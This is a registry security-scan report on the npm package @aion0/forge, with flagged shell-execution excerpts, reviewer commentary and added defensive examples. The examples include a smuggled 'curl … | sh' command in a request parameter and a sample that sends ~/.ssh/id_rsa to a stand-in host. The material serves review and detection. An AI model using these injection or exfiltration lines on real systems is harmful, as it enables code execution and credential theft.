
@aion0/forge@0.13.4

⚠ Under review

Unified AI workflow platform — multi-model task orchestration, persistent sessions, web terminal, remote access

Static Scan Results

scanned 1d ago · by rust-scanner

Static analysis flagged 22 finding(s) at 93.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.

Static reason
High-risk behavior combination matched the malicious policy; the diff against the previous stored version introduced a dangerous source file.

Decision evidence

Public snapshot

Behavioral surface
Source: Child Process, Crypto, Dynamic Require, Environment Vars, Eval, Filesystem, Network, Shell, WebSocket
Supply chain: High Entropy Strings, Url Strings
Manifest: No manifest risk signals triggered.
scanned 485 file(s), 4.62 MB of source, external domains: 0.0.0.0, 127.0.0.1, api.anthropic.com, api.deepseek.com, api.github.com, api.openai.com, api.telegram.org, api.x.ai, cli.github.com, dashscope.aliyuncs.com, enterprise-center.example.com, example.com, generativelanguage.googleapis.com, git-scm.com, github.com, gitlab.com, nvd.nist.gov, raw.githubusercontent.com, registry.npmjs.org, www.w3.org

Source & flagged code

15 flagged
app/api/craft-system/publish/auto/route.ts

L19: // args[0] is the program; the rest are literal arguments. Throws on non-zero exit.
L20: function exec(args: readonly string[], cwd?: string, timeout = 60000): string {
L21:   return run(args[0], args.slice(1), { cwd, timeout, maxBuffer: 10 * 1024 * 1024 });

High
Child Process

Package source references child process execution. The excerpt uses the argv form (a program plus literal arguments, no shell), which rules out shell-metacharacter injection; whether request input can choose the program or its arguments is not visible in the excerpt and has to be checked in the full file.

app/api/craft-system/publish/auto/route.ts · L19
lib/plugins/executor.ts

L140: async function executeShell(action: PluginAction, ctx: Record<string, any>): Promise<PluginActionResult> {
L141:   // Shell actions run a free-form `/bin/sh -c` built from a template + request
L142:   // params — RCE by design. Enforce the operator opt-in flag HERE, at the single

High
Shell

Package source references shell execution. The excerpt's own comment states that the action runs a free-form `/bin/sh -c` string built from a template plus request params and that it is meant to be gated by an operator opt-in flag; the review should confirm the flag is checked before any template is rendered and that request params cannot reach the shell string unquoted.

lib/plugins/executor.ts · L140
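The following is an added example, not code from @aion0/forge, showing what the flagged comment describes and the two controls a reviewer would look for: a template rendered into `/bin/sh -c` (where a request param is shell syntax), the same action behind an operator opt-in gate with params single-quoted, and an argv form where each param fills one slot and an allowlist rejects a leading `-`. The names `planShellAction`, `planArgvAction` and `ctx.allowShellActions` are illustrative assumptions, not the project's API; nothing is spawned, each planner only returns the `{cmd, args}` it would pass to `child_process.spawn`.

```javascript
// Added example; not the project's executor. Two ways to turn a plugin action
// template plus request params into a process launch, and the operator opt-in
// gate the flagged comment asks for. planShellAction, planArgvAction and
// ctx.allowShellActions are illustrative names, not @aion0/forge APIs.
// Nothing is executed here: each planner returns the {cmd, args} it would
// hand to child_process.spawn, so the difference is visible as data.

// Naive rendering: params are spliced into the template as text. Under
// /bin/sh -c this is exactly the "RCE by design" the flagged comment describes.
function renderTemplate(template, params) {
  return template.replace(/\{\{(\w+)\}\}/g, (_, key) => {
    if (!(key in params)) throw new Error('missing param ' + key);
    return String(params[key]);
  });
}

// POSIX single-quoting: everything between quotes is literal except the quote
// itself, which is closed, escaped and reopened.
function shellQuote(s) {
  return "'" + String(s).replace(/'/g, "'\\''") + "'";
}

// Shell mode. Refuses unless the operator opted in, and quotes every param so
// metacharacters in request input stay inside one shell word.
function planShellAction(action, params, ctx) {
  if (ctx.allowShellActions !== true) {
    return { ok: false, reason: 'shell actions disabled by operator config' };
  }
  const quoted = Object.fromEntries(
    Object.entries(params).map(([k, v]) => [k, shellQuote(v)]),
  );
  return { ok: true, cmd: '/bin/sh', args: ['-c', renderTemplate(action.template, quoted)], shell: true };
}

// Argv mode: the template is a token list, each param fills exactly one slot,
// and no shell ever sees it. The allowlist additionally rejects a leading "-",
// because argv form stops shell injection but not argument injection
// (a param turning into an option such as --output=/etc/cron.d/x).
const PARAM_ALLOWED = /^[A-Za-z0-9_.][A-Za-z0-9_./:@=-]*$/;

function planArgvAction(action, params) {
  const args = action.argv.map((tok) => {
    const m = /^\{\{(\w+)\}\}$/.exec(tok);
    if (!m) return tok;
    const value = String(params[m[1]] ?? '');
    if (!PARAM_ALLOWED.test(value)) throw new Error('param ' + m[1] + ' rejected by allowlist');
    return value;
  });
  return { ok: true, cmd: args[0], args: args.slice(1), shell: false };
}

// Constructed action and a hostile request param (the domain is made up).
const ACTION = { template: 'git log -1 {{ref}}', argv: ['git', 'log', '-1', '{{ref}}'] };
const HOSTILE = { ref: 'main; curl http://collector.example/x | sh' };

console.log(renderTemplate(ACTION.template, HOSTILE));            // second command spliced in
console.log(planShellAction(ACTION, HOSTILE, { allowShellActions: false }));
console.log(planShellAction(ACTION, HOSTILE, { allowShellActions: true }).args[1]);
try { planArgvAction(ACTION, HOSTILE); } catch (e) { console.log(e.message); }
console.log(planArgvAction(ACTION, { ref: 'main' }));
```

In shell mode with quoting, git receives the whole hostile string as one (invalid) ref and `curl` never runs; in argv mode the same input is rejected outright, and a value such as `--output=/tmp/x` is rejected as well even though it contains no shell metacharacters.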
lib/crafts/runtime.ts

L17: // Function-wrapped dynamic import so Turbopack doesn't try to statically resolve the URL.
L18: const dynamicImport = new Function('u', 'return import(u)') as (u: string) => Promise<any>;
L19:

High
Eval

Package source references dynamic code evaluation. Here `new Function` only wraps `import(u)` to hide it from the bundler; the risk lies in what `u` can be (a URL or path) and who controls it, which the excerpt does not show.

lib/crafts/runtime.ts · L17
app/api/monitor/route.ts

L101: try {
L102:   const { readFileSync } = require('fs');
L103:   const { join } = require('path');

Medium
Dynamic Require

Package source references dynamic require/import behavior. The excerpt requires only the built-in `fs` and `path` modules by string literal; the finding reflects the in-function `require` pattern, not a variable module name.

app/api/monitor/route.ts · L101
app/api/crafts/route.ts

L13: const projectPath = url.searchParams.get('projectPath');
L14: if (!projectPath) return NextResponse.json({ error: 'projectPath required' }, { status: 400 });
L15: const all = listProjectCrafts(projectPath);

Low
Weak Crypto

Package source references weak cryptographic algorithms. The excerpt shown for L13 contains no cryptographic call, so the match context is elsewhere in the file or in the scanner's rule; verify it in the full source before acting on it.

app/api/crafts/route.ts · L13
cli/mw.mjs

L501: });
L502: import { execSync, spawnSync } from "node:child_process";
L503: import { existsSync as existsSync2, readdirSync, statSync } from "node:fs";
...
L507: const port = portArgIdx >= 0 ? process.argv[portArgIdx + 1] : void 0;
L508: return process.env.MW_URL || `http://localhost:${port || "8403"}`;
L509: }

High
Same File Env Network Execution

A single source file combines environment access, network access, and code or shell execution; review context before blocking. This rule fires on co-occurrence, not on data flow between the three. In the excerpt the environment read is `MW_URL`, falling back to a localhost address on the same default port (8403) that lib/task-manager.ts uses, which is consistent with a CLI talking to the package's own local server rather than with an external endpoint.

cli/mw.mjs · L501
lib/task-manager.ts

L6: import { randomUUID } from 'node:crypto';
L7: import { spawn, execSync } from 'node:child_process';
L8: import { realpathSync, existsSync } from 'node:fs';
...
L245: let entry: TaskLogEntry & { _truncated?: number; _index?: number };
L246: try { entry = JSON.parse(r.value); }
L247: catch { entry = { type: 'system', content: '<unparseable entry>' } as any; }
...
L561: _tmuxHookInstalled = true;
L562: try { installForgeStopHook(Number(process.env.PORT) || 8403); } catch {}
L563: }
...
L607: // entire Next.js worker and triggering a supervisor restart loop.
L608: const shell = process.env.SHELL && process.env.SHELL.endsWith('bash') ? process.env.SHELL : '/bin/bash';
L609: const child = spawn(shell, ['-c', task.prompt], {

Critical
Command Output Exfiltration

Source executes local commands and sends command output to an external endpoint. The excerpt shows the execution side: `task.prompt` is handed to `bash -c` verbatim, so whoever can create a task can run arbitrary shell commands as the server user. The outbound send is not in the excerpt; the external-domain list above (api.telegram.org, api.github.com, the model-provider APIs) gives the candidate endpoints to which the command output should be traced before the finding is confirmed as exfiltration rather than as the package's intended remote-access feature.

lib/task-manager.ts · L6
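To make the difference between the two findings above concrete, here is an added example (not code from @aion0/forge or from the registry's scanner) that implements both heuristics in miniature and runs them over two constructed sources: a co-occurrence rule for "same file env + network + execution", and an exfiltration rule that only fires when a variable assigned from a `child_process` call appears inside the argument list of a network call. The first sample copies the shape of cli/mw.mjs (env read, localhost URL, a git call) and comes out as a high-severity co-occurrence that needs a human look; the second is the pattern the critical rule exists for. The sample sources and the `collector.example` domain are constructed; the regex-based matching is a stand-in for the AST analysis a real scanner would use.

```javascript
// Added example; not code from @aion0/forge or from the registry scanner.
// A minimal version of the two heuristics behind the findings above:
//   - "same file env + network + execution": co-occurrence of the three sinks
//   - "command output exfiltration": a variable assigned from a child_process
//     call appears inside the argument list of a network call
// Sinks are matched with regular expressions on constructed sample sources;
// a real scanner works on an AST, but the shape of the verdict is the same.

const SURFACE = {
  env: /\bprocess\.env\b/g,
  network: /\b(?:fetch|https?\.(?:request|get)|WebSocket|axios\.\w+)\s*\(/g,
  exec: /\b(?:spawn|spawnSync|exec|execSync|execFile|execFileSync|eval|new Function)\s*\(/g,
};

// Count hits per category; a category missing from the result did not occur.
function behaviorSurface(src) {
  const out = {};
  for (const [name, re] of Object.entries(SURFACE)) {
    const hits = src.match(re);
    if (hits) out[name] = hits.length;
  }
  return out;
}

// Text between the '(' at openIdx and its matching ')'. Ignores parentheses
// inside string literals, which is acceptable for these samples.
function callArgs(src, openIdx) {
  let depth = 0;
  for (let i = openIdx; i < src.length; i++) {
    if (src[i] === '(') depth++;
    else if (src[i] === ')' && --depth === 0) return src.slice(openIdx + 1, i);
  }
  return src.slice(openIdx + 1);
}

// Names of variables assigned directly from a child_process call.
function execOutputVars(src) {
  const vars = new Set();
  const re = /\b(?:const|let|var)\s+(\w+)\s*=\s*(?:await\s+)?(?:spawnSync|execSync|execFileSync|exec|execFile)\s*\(/g;
  let m;
  while ((m = re.exec(src))) vars.add(m[1]);
  return vars;
}

// Network calls whose argument list mentions one of those variables.
function exfilCandidates(src) {
  const vars = execOutputVars(src);
  const found = [];
  if (vars.size === 0) return found;
  const re = /\b(fetch|https?\.request|WebSocket|axios\.\w+)\s*\(/g;
  let m;
  while ((m = re.exec(src))) {
    const args = callArgs(src, m.index + m[0].length - 1);
    for (const v of vars) {
      if (new RegExp('\\b' + v + '\\b').test(args)) found.push({ sink: m[1], variable: v });
    }
  }
  return found;
}

// Verdict: data flow from exec to network is critical; bare co-occurrence of
// env + network + exec is high and needs context before anyone blocks.
function triage(file, src) {
  const surface = behaviorSurface(src);
  const exfil = exfilCandidates(src);
  const combo = Boolean(surface.env && surface.network && surface.exec);
  const severity = exfil.length ? 'critical' : combo ? 'high' : 'none';
  return { file, surface, exfil, severity };
}

// Constructed sample 1, shaped like cli/mw.mjs: env read, localhost URL, a git
// call. Nothing from the git call reaches the network.
const SAMPLE_CLI = [
  'import { execSync } from "node:child_process";',
  'const base = process.env.MW_URL || "http://localhost:8403";',
  'const head = execSync("git rev-parse HEAD", { encoding: "utf8" }).trim();',
  'const res = await fetch(base + "/status");',
  'console.log(head, res.status);',
].join('\n');

// Constructed sample 2: what the critical rule is meant to catch.
const SAMPLE_EXFIL = [
  'const { execSync } = require("node:child_process");',
  'const out = execSync("cat ~/.ssh/id_rsa", { encoding: "utf8" });',
  'fetch("https://collector.example/drop", { method: "POST", body: out });',
].join('\n');

for (const [file, src] of [['cli.mjs', SAMPLE_CLI], ['drop.js', SAMPLE_EXFIL]]) {
  console.log(JSON.stringify(triage(file, src)));
}
```

The point of the split is the one the mw.mjs finding text makes: the co-occurrence rule is a prompt to read the file, while the exfiltration rule needs an actual path from the command's output into a network sink, which is what a reviewer has to locate in lib/task-manager.ts before treating it as confirmed.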
bin/forge-server.mjs

L67: // installed npm-package copy (.npmrc isn't published).
L68: execSync('npm install --include=dev --legacy-peer-deps', { cwd: ROOT, stdio: 'inherit' });
L69: }

High
Runtime Package Install

Package source invokes a package manager install command at runtime. Running `npm install` at start-up means dependencies, including dev dependencies and their lifecycle scripts, are resolved from the registry on the host at that moment rather than being fixed by the published tarball, and `--legacy-peer-deps` relaxes peer-dependency resolution on top of that.

bin/forge-server.mjs · L67
check-forge-status.sh

path: check-forge-status.sh · kind: build_helper · sizeBytes: 3853 · magicHex: [redacted]

Medium
Ships Build Helper

Package ships non-JavaScript build or shell helper files.

check-forge-status.sh
docs/Forge_Strategy_Research_2026.docx

path: docs/Forge_Strategy_Research_2026.docx · kind: high_entropy_blob · sizeBytes: 23982 · magicHex: [redacted]

High
Ships High Entropy Blob

Package ships high-entropy non-source blobs. A .docx is an OOXML ZIP container, so this finding and the two below describe the same 24 KB document; unzip it and inspect the parts (word/document.xml, any media or embedded objects) rather than treating them as three artifacts.

docs/Forge_Strategy_Research_2026.docx

path: docs/Forge_Strategy_Research_2026.docx · kind: compressed_blob · sizeBytes: 23982 · magicHex: [redacted]

Medium
Ships Compressed Blob

Package ships compressed or archive-like blobs.

docs/Forge_Strategy_Research_2026.docx

path: docs/Forge_Strategy_Research_2026.docx · kind: nested_archive_needs_inspection · sizeBytes: 23982 · magicHex: [redacted]

Low
Nested Archive Needs Inspection

Package ships a nested archive or MCP bundle that was inventoried but not recursively analyzed.

docs/Forge_Strategy_Research_2026.docx
lib/init.ts

matchType: previous_version_dangerous_delta · matchedPackage: @aion0/forge@0.11.19 · matchedIdentity: npm:QGFpb24wL2Zvcmdl:0.11.19 · similarity: 0.908 · summary: stored previous version shares package body but lacks this dangerous source file

Critical
Previous Version Dangerous Delta

This package version adds a dangerous source file absent from the previous stored version; route for source-aware review. The stored baseline is 0.11.19, so if versions were published between 0.11.19 and 0.13.4 the file may have been introduced in any of them; the review should diff lib/init.ts against the nearest prior version as well.

lib/init.ts
lib/help-docs/21-build-connector.md

patternName: generic_password · severity: medium · line: 159 · matchedText: password...en}'

Medium
Secret Pattern

Hardcoded password in lib/help-docs/21-build-connector.md. The matched text ends in `}'`, consistent with a templated placeholder in a help document rather than a live credential; open the file at L159 to confirm.

lib/help-docs/21-build-connector.md · L159

patternName: generic_password · severity: medium · line: 208 · matchedText: password...rd}'

Medium
Secret Pattern

Hardcoded password in lib/help-docs/21-build-connector.md. As with the match at L159, the text ends in `}'` and looks like a placeholder; confirm at L208.

lib/help-docs/21-build-connector.md · L208

Findings

2 Critical · 6 High · 8 Medium · 6 Low

Severity · Finding · File
Critical · Command Output Exfiltration · lib/task-manager.ts
Critical · Previous Version Dangerous Delta · lib/init.ts
High · Child Process · app/api/craft-system/publish/auto/route.ts
High · Shell · lib/plugins/executor.ts
High · Eval · lib/crafts/runtime.ts
High · Same File Env Network Execution · cli/mw.mjs
High · Runtime Package Install · bin/forge-server.mjs
High · Ships High Entropy Blob · docs/Forge_Strategy_Research_2026.docx
Medium · Dynamic Require · app/api/monitor/route.ts
Medium · Network
Medium · Environment Vars
Medium · Ships Build Helper · check-forge-status.sh
Medium · Ships Compressed Blob · docs/Forge_Strategy_Research_2026.docx
Medium · Structural Risk Force Deep Review
Medium · Secret Pattern · lib/help-docs/21-build-connector.md
Medium · Secret Pattern · lib/help-docs/21-build-connector.md
Low · Scripts Present
Low · Weak Crypto · app/api/crafts/route.ts
Low · Filesystem
Low · High Entropy Strings
Low · Url Strings
Low · Nested Archive Needs Inspection · docs/Forge_Strategy_Research_2026.docx